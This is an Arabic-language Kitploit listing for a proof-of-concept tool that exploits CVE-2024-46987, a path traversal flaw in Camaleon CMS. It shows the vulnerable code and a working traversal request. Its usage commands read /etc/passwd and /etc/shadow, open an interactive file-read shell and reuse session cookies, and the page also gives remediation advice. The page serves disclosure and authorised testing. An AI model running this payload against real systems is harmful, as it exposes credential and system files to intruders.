Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46987 — استغلال PoC لـ CVE-2024-46987 — اجتياز مسار تعسفي (قراءة ملف) في Camaleon CMS | Kitploit
أدوات/GitHubGitHub/blueberryp1ll/cve-2024-46987
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubblueberryp1ll/cve-2024-46987

CVE-2024-46987

استغلال PoC لـ CVE-2024-46987 — اجتياز مسار تعسفي (قراءة ملف) في Camaleon CMS

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-46987 — تجاوز المسار التعسفي في Camaleon CMS

فقط للتقييمات الأمنية المصرح بها، واختبارات الاختراق، والبحث التعليمي.

نظرة عامة

الحقلالتفاصيل
CVECVE-2024-46987
المنتجCamaleon CMS
الإصدارات>= 2.8.0, < 2.8.2 (تم التأكيد أيضًا على 2.9.0)
النوعتجاوز المسار / قراءة ملفات عشوائية (CWE-22)
المصادقةمطلوب (أي حساب بصلاحيات منخفضة)
التقييم7.7 عالي — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
تم الإصلاح في2.8.2

الثغرة

MediaController#download_private_file يمرر params[:file] غير منقى إلى fetch_file:

root@kitploit:~
# Vulnerable sink
fetch_file("private/#{params[:file]}")

لا يتم تطبيق أي تطبيع للمسار قبل استخدام القيمة مع send_file، مما يسمح لمهاجم مصرح له بالخروج من دليل private/ باستخدام تسلسلات ../ وقراءة ملفات عشوائية يمكن لعملية Rails الوصول إليها.

النقطة الضعيفة:

root@kitploit:~
GET /admin/media/download_private_file?file=../../../../../../etc/passwd

المتطلبات

  • بايثون 3.8+
  • مكتبة requests
root@kitploit:~
pip3 install requests

الاستخدام

root@kitploit:~
usage: CVE-2024-46987.py [-h] -u URL (--cookie COOKIE | -U USERNAME)
                         [-P PASSWORD] [-f FILE] [-d DEPTH]
                         [--interesting] [--interactive]
                         [--no-verify] [--debug]

المصادقة القائمة على بيانات الاعتماد

root@kitploit:~
# Read /etc/passwd (default)
python3 CVE-2024-46987.py -u http://target.com -U admin -P password

# Read a specific file
python3 CVE-2024-46987.py -u http://target.com -U admin -P password -f /etc/shadow

# Scan a list of high-value paths automatically
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interesting

# Interactive file-read shell
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interactive

إعادة استخدام جلسة موجودة (من Burp Suite / أدوات المطورين في المتصفح)

root@kitploit:~
# Single file
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX" -f /etc/passwd

# Interactive shell
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX; auth_token=YYYY" --interactive

الخيارات

العلامةالوصف
-uعنوان URL الهدف الأساسي
-U / -Pاسم المستخدم وكلمة المرور لنظام CMS
--cookieسلسلة ملفات تعريف الارتباط الخام (بديل لبيانات الاعتماد)
-fمسار الملف المراد قراءته (الافتراضي: /etc/passwd)
-dعمق التجاوز — عدد مرات إضافة ../ (الافتراضي: 10)
--interestingالمرور عبر قائمة مدمجة من المسارات عالية القيمة
--interactiveواجهة تفاعلية لقراءة الملفات
--no-verifyتعطيل التحقق من شهادة TLS
--debugإخراج مفصل لتشخيص فشل المصادقة

ملاحظات حول الملفات الزائفة /proc

الملفات الموجودة تحت /proc/self/ (مثل environ، cmdline) تعيد HTTP 200 ولكن محتوى فارغ. هذا متوقع — حيث يبلغ النواة عن حجمها كـ 0، لذا فإن send_file في Rails لا يدفق شيئًا. استخدم الملفات العادية المسطحة بدلاً من ذلك.

الإصلاح

قم بترقية Camaleon CMS إلى الإصدار 2.8.2 أو أحدث. يضيف التصحيح تطبيعًا مناسبًا للمسار ويضمن بقاء المسار المحلول ضمن الدليل المقصود قبل استدعاء send_file.

بدلاً من ذلك:

  • قم بتطبيع جميع مسارات الملفات المقدمة من المستخدم قبل الاستخدام.
  • ارفض أي إدخال يحتوي على تسلسلات ...
  • طبق مبدأ أقل الصلاحيات على مستخدم نظام التشغيل الذي يدير عملية Rails.

المراجع

  • GHSA-cp65-5m9r-vc2c — إعلان GitHub
  • GHSL-2024-183 — مختبر أمان GitHub
  • NVD — CVE-2024-46987

إخلاء مسؤولية

تم نشر هذا الإثبات المبدئي للأغراض التعليمية ولمساعدة محترفي الأمن في فهم وإعادة إنتاج الثغرة في بيئات الاختبار المصرح بها. المؤلف غير مسؤول عن أي سوء استخدام. احصل دائمًا على إذن كتابي صريح قبل اختبار الأنظمة التي لا تملكها.

تنزيل الأداة